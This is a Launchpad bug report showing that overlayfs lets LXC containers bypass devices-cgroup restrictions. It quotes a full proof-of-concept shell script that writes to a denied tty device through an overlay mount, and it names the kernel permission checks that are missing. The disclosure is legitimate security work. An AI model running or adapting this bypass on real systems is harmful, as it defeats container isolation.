Public bug reported:

Using overlayfs with lxc causes tty problems that can kill X: device nodes reached
through the overlay bypass the devices cgroup restrictions applied to the
container. Overlayfs needs to honor the necessary cgroup permission calls, per
the following information from Serge.

"""
here is a script which you can use to test the overlayfs
issue:

========================= exploit-overlayfs-devices.sh =======================
#!/bin/bash

ddir=`cat /proc/self/mountinfo | grep cgroup | grep devices | awk '{ print $5 }'`
if [ "x$ddir" = "x" ]; then
        echo "couldn't find devices cgroup mountpoint"
        exit 1
fi

# create new cgroup
ndir=`mktemp -d --tmpdir=$ddir exploit-XXXX`

# create a directory onto which we mount the overlay
odir=`mktemp -d --tmpdir=/mnt exploit-XXXX`

# create the directory to be the overlay dir (where changes
# will be written)
udir=`mktemp -d --tmpdir=/tmp exploit-XXX`

mount -t overlayfs -oupperdir=$udir,lowerdir=/dev none $odir
echo $$ > $ndir/tasks
# deny all device actions
echo a > $ndir/devices.deny
# but allow mknod of tty5 (char 4:5), bc we have to mknod it in the writeable
# overlay
echo "c 4:5 m" > $ndir/devices.allow
echo "devices.list: XXXXXXXXXXXXXXX"
cat $ndir/devices.list
echo "XXXXXXXXXXXX"

# try writing to /dev/tty5 - not allowed
echo x > /dev/tty5
echo "write to /dev/tty5 returned $?"

# try writing to tty5 on the overlayfs - SHOULD not be allowed
echo y > $odir/tty5
echo "write to $odir/tty5 returned $?"

umount $odir
rmdir $odir
rm -rf $udir

# move ourselves back to root cgroup (else we can't delete the temp one
# bc it's occupied - by us)
echo $$ > $ddir/tasks
rmdir $ndir
========================= exploit-overlayfs-devices.sh =======================

The write to /dev/tty5 will fail, but the write to $odir/tty5 will
succeed.

fs/overlayfs/inode.c calls generic_permission, but it needs to do more
of what fs/namei.c:inode_permission() does, in particular the calls to
devcgroup_inode_permission() and security_inode_permission().
"""

[This blocks resolution of bug 914169]

** Affects: launchpad
     Importance: High
         Status: Triaged

** Affects: lxc (Ubuntu)
     Importance: Undecided
         Status: New


** Tags: paralleltest

** Also affects: launchpad
   Importance: Undecided
       Status: New

** Changed in: launchpad
       Status: New => Triaged

** Changed in: launchpad
   Importance: Undecided => High

-- 
You received this bug notification because you are a member of Ubuntu
Server Team, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/915941

Title:
  overlayfs does not honor lxc-related permissions
